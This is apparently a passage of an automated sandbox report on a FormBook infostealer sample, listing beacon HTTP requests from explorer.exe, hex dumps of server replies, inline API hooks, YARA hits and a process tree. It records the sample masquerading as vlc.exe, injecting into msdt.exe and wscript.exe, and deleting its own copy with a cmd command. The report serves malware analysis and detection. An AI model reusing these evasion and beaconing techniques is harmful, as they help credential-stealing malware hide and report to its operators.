                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 73 72 63 3d 22 2f 2f 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 66 72 6d 70 61 72 6b 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63
                                            Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"></div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + 'src="//sedoparking.com/frmpark/' + window.loc


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            1192.168.2.64975852.58.78.1680C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Nov 27, 2020 15:58:55.112926960 CET6927OUTGET /gwg/?kzrh28=aQP8xClfH3FnyC2bbHADmWrvnT3A6FAlsj34gFGOFlECHJLTyiLQwMrWm8hFX/dhtuP/m5zmeg==&9rn=O2JDHJlpz2Rt546p HTTP/1.1
                                            Host: www.privateinvestigationsanjose.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Nov 27, 2020 15:58:55.129667997 CET6927INHTTP/1.1 410 Gone
                                            Server: openresty/1.13.6.2
                                            Date: Fri, 27 Nov 2020 14:58:13 GMT
                                            Content-Type: text/html
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 35 66 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 70 72 69 76 61 74 65 69 6e 76 65 73 74 69 67 61 74 69 6f 6e 73 61 6e 6a 6f 73 65 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 34 62 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 70 72 69 76 61 74 65 69 6e 76 65 73 74 69 67 61 74 69 6f 6e 73 61 6e 6a 6f 73 65 2e 63 6f 6d 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7<html>9 <head>5f <meta http-equiv='refresh' content='5; url=http://www.privateinvestigationsanjose.com/' />a </head>9 <body>4b You are being redirected to http://www.privateinvestigationsanjose.coma </body>8</html>0


                                            Code Manipulations

                                            User Modules

                                            Hook Summary

                                            Function NameHook TypeActive in Processes
                                            PeekMessageAINLINEexplorer.exe
                                            PeekMessageWINLINEexplorer.exe
                                            GetMessageWINLINEexplorer.exe
                                            GetMessageAINLINEexplorer.exe

                                            Processes

                                            Process: explorer.exe, Module: user32.dll
                                            Function NameHook TypeNew Data
                                            PeekMessageAINLINE0x48 0x8B 0xB8 0x81 0x1E 0xEC
                                            PeekMessageWINLINE0x48 0x8B 0xB8 0x89 0x9E 0xEC
                                            GetMessageWINLINE0x48 0x8B 0xB8 0x89 0x9E 0xEC
                                            GetMessageAINLINE0x48 0x8B 0xB8 0x81 0x1E 0xEC

                                            Statistics

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Start time:15:57:09
                                            Start date:27/11/2020
                                            Path:C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe'
                                            Imagebase:0xf20000
                                            File size:552960 bytes
                                            MD5 hash:7E26E87AB642008D934824D509559859
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.362182042.0000000004291000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.362182042.0000000004291000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.362182042.0000000004291000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            General

                                            Start time:15:57:21
                                            Start date:27/11/2020
                                            Path:C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe
                                            Imagebase:0x930000
                                            File size:552960 bytes
                                            MD5 hash:7E26E87AB642008D934824D509559859
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.361705637.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.361705637.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.361705637.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            General

                                            Start time:15:57:28
                                            Start date:27/11/2020
                                            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe'
                                            Imagebase:0xad0000
                                            File size:552960 bytes
                                            MD5 hash:7E26E87AB642008D934824D509559859
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.395346123.0000000003E81000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.395346123.0000000003E81000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.395346123.0000000003E81000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Antivirus matches:
                                            • Detection: 100%, Avira
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 29%, ReversingLabs
                                            Reputation:low

                                            General

                                            Start time:15:57:36
                                            Start date:27/11/2020
                                            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe
                                            Imagebase:0xda0000
                                            File size:552960 bytes
                                            MD5 hash:7E26E87AB642008D934824D509559859
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.472784516.00000000016C0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.472784516.00000000016C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.472784516.00000000016C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.472823831.00000000016F0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.472823831.00000000016F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.472823831.00000000016F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.469558497.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.469558497.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.469558497.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            General

                                            Start time:15:57:36
                                            Start date:27/11/2020
                                            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe'
                                            Imagebase:0x4e0000
                                            File size:552960 bytes
                                            MD5 hash:7E26E87AB642008D934824D509559859
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.421292153.0000000003831000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.421292153.0000000003831000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.421292153.0000000003831000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            General

                                            Start time:15:57:38
                                            Start date:27/11/2020
                                            Path:C:\Windows\explorer.exe
                                            Wow64 process (32bit):false
                                            Commandline:
                                            Imagebase:0x7ff6f22f0000
                                            File size:3933184 bytes
                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:15:57:48
                                            Start date:27/11/2020
                                            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe
                                            Imagebase:0xf50000
                                            File size:552960 bytes
                                            MD5 hash:7E26E87AB642008D934824D509559859
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.430429619.0000000001580000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.430429619.0000000001580000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.430429619.0000000001580000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.429223817.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.429223817.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.429223817.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.430333784.0000000001550000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.430333784.0000000001550000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.430333784.0000000001550000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            General

                                            Start time:15:57:50
                                            Start date:27/11/2020
                                            Path:C:\Windows\SysWOW64\msdt.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\msdt.exe
                                            Imagebase:0x920000
                                            File size:1508352 bytes
                                            MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.602316294.0000000000C40000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.602316294.0000000000C40000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.602316294.0000000000C40000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.603587464.0000000002FB0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.603587464.0000000002FB0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.603587464.0000000002FB0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:moderate

                                            General

                                            Start time:15:57:56
                                            Start date:27/11/2020
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:/c del 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe'
                                            Imagebase:0x2a0000
                                            File size:232960 bytes
                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:15:57:56
                                            Start date:27/11/2020
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff61de10000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:15:58:09
                                            Start date:27/11/2020
                                            Path:C:\Windows\SysWOW64\wscript.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\wscript.exe
                                            Imagebase:0x12e0000
                                            File size:147456 bytes
                                            MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.471808114.0000000000590000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.471808114.0000000000590000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.471808114.0000000000590000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:high

                                            Disassembly

                                            Code Analysis

                                            Reset < >